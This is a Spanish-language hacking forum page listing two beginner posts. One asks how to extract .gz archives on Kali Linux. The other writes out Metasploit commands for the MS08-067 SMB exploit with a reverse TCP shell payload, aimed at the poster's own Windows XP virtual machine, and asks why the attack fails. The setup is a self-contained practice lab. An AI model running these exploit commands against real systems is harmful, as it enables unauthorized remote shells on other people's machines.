elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Temas
Páginas: 1 [2]
11  Sistemas Operativos / GNU/Linux / Problema Instalar en KALI en: 18 Febrero 2014, 19:14 pm
Muy beunas tardes tengan ustedes.

Tengo el problema que al descargar cualquier aplicacion .gz y demas, no me deja y me dice que no hay ningun programa para descompresion de ese archivo, ya intente instalar LDZM el descompresos que deberia de haber traido como cualquier distro, pero tampoco me deja abrirlo, tampoco desde la terminal por si te lo estas preguntando, los programas que quisiera istalar y extraer por ejemplo son:

Navegador TOR
EXIFTOOL

y cualquier otro programa que tenga que instalar.

De antemano muchas gracias..
12  Seguridad Informática / Bugs y Exploits / Metasploit en: 24 Enero 2014, 19:26 pm
Hola muye buenas tardes. :D
Espero puedan ayudarme, ya que me concidero novato y me gusta mucho aprender.

Tengo en una maquina virtual montado Kali Linux y en otra Backtrack 5 r3 y en la tercera tengo Win Xp y e estado intentando hacerme de una windows shell dentro de la que tiene WinXP desde kali y backtrack, pero hasta ahora solo e logrado fracasar, no me e rendido, pero si me pudieran guiar, explicar o proporcionar algun otro metedo.
lo e estado intentando con el PAYLOAD desde MSFCONSOLE, tambien con ARMITAGE e usado tambien estos comandos que les escribire tal cual los use:
 :huh:
use exploit/windows/smb/ms08_067_netapi
set RHOST 000.000.000.000  <-----Ip a atacar
set payload windows/shell/reverse_tcp
set LHOST 000.000.000.000   <----Ip atacante
exploit

Pero tampoco dan resultado, simplemente no carga el exploit, o me dice algo del packete en ingles, o (no-targget), pero siempre ingreso la ip de la victima que en este caso es mi otra maquina virtual, las tres maquinas las tengo en modo britged, (adaptador puente)desde VBox


Ayudame por favor
*****************************************************************************
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines